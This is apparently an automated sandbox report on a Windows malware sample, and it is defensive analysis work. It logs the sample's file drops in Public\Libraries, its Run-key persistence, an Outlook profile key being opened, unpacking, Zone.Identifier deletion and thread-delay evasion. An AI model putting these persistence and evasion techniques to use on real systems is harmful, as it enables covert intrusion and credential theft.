Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\Libraries\xrbjyllC.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: z1Transaction_ID_REF2418_cmd.bat Static file information: File size 1139107 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: _.pdb source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
Source: Binary string: easinvoker.pdbH source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.0000000003004000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003000000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021720000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021751000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr

Data Obfuscation

Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack
Source: Yara match File source: 3.2.x.exe.31c0000.0.unpack, type: UNPACKEDPE
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: xrbjyllC.pif.3.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D894C LoadLibraryW,GetProcAddress,FreeLibrary, 3_2_031D894C
Source: alpha.pif.6.dr Static PE information: section name: .didat
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C332C push eax; ret 3_2_031C3368
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031CC349 push 8B031CC1h; ret 3_2_031CC34E
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031EC378 push 031EC56Eh; ret 3_2_031EC566
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C63B0 push 031C640Bh; ret 3_2_031C6403
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C63AE push 031C640Bh; ret 3_2_031C6403
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031ED2FC push 031ED367h; ret 3_2_031ED35F
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DF108 push ecx; mov dword ptr [esp], edx 3_2_031DF10D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031ED144 push 031ED1ECh; ret 3_2_031ED1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031ED1F8 push 031ED288h; ret 3_2_031ED280
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D306C push 031D30B9h; ret 3_2_031D30B1
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D306B push 031D30B9h; ret 3_2_031D30B1
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031ED0AC push 031ED125h; ret 3_2_031ED11D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C6784 push 031C67C6h; ret 3_2_031C67BE
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C6782 push 031C67C6h; ret 3_2_031C67BE
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031EC570 push 031EC56Eh; ret 3_2_031EC566
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031CC56C push ecx; mov dword ptr [esp], edx 3_2_031CC571
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031CD5A0 push 031CD5CCh; ret 3_2_031CD5C4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031CCBEC push 031CCD72h; ret 3_2_031CCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031CCA1E push 031CCD72h; ret 3_2_031CCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03234A50 push eax; ret 3_2_03234B20
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DAADF push 031DAB18h; ret 3_2_031DAB10
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D8AD8 push 031D8B10h; ret 3_2_031D8B08
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DAAE0 push 031DAB18h; ret 3_2_031DAB10
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D790C push 031D7989h; ret 3_2_031D7981
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D6948 push 031D69F3h; ret 3_2_031D69EB
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D6946 push 031D69F3h; ret 3_2_031D69EB
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D886C push 031D88AEh; ret 3_2_031D88A6
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D2F60 push 031D2FD6h; ret 3_2_031D2FCE
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D5E7C push ecx; mov dword ptr [esp], edx 3_2_031D5E7E
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_0041C40C push cs; iretd 9_2_0041C4E2
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_00423149 push eax; ret 9_2_00423179
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Cllyjbrx.PIF
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\xrbjyllC.pif
Source: C:\Users\Public\Libraries\xrbjyllC.pif File created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\user\AppData\Local\Temp\x.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\x.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cllyjbrx
Source: C:\Users\Public\Libraries\xrbjyllC.pif Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIb
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\Public\Libraries\xrbjyllC.pif File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_031DAB1C
Source: C:\Users\Public\Libraries\xrbjyllC.pif Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\Public\Libraries\xrbjyllC.pif Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\xrbjyllC.pif Memory allocated: 27F60000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif Memory allocated: 29C90000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif Memory allocated: 29A90000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif Memory allocated: 24F10000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif Memory allocated: 26F50000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif Memory allocated: 26D70000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif Memory allocated: 206D0000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif Memory allocated: 22710000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif Memory allocated: 22320000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 9_2_004019F0
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599875
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599766
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599656
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599547
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599438
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599313
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599203
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599094
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598969
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598860
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598735
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598610
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598485
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598360
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598222
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598068
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597946
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597844
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597719
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597610
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597485
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597360
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597235
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597110
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596981
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596875
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596767
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596640
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596528
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596416
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596304
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596188
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596050
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595938
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595810
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595698
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595585
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595249
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595123
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594911
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594789
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594677
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594564
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594439
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594313
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594177
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593997
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593860
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593658
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593506
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593369
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593196
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593011
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 592620
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 592105
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 591918
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 591659
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599891
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599344
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599124
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599007
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598891
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598780
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598422
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598297
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598172
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598062
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597953
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597844
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597719
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597609
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597500
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597391
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597281
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597172
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597062
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596953
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596844
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596734
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596625
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596515
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596406
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596297
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596187
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596078
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595932
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595813
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595700
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595579
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595466
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595344
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595016
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594906
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594797
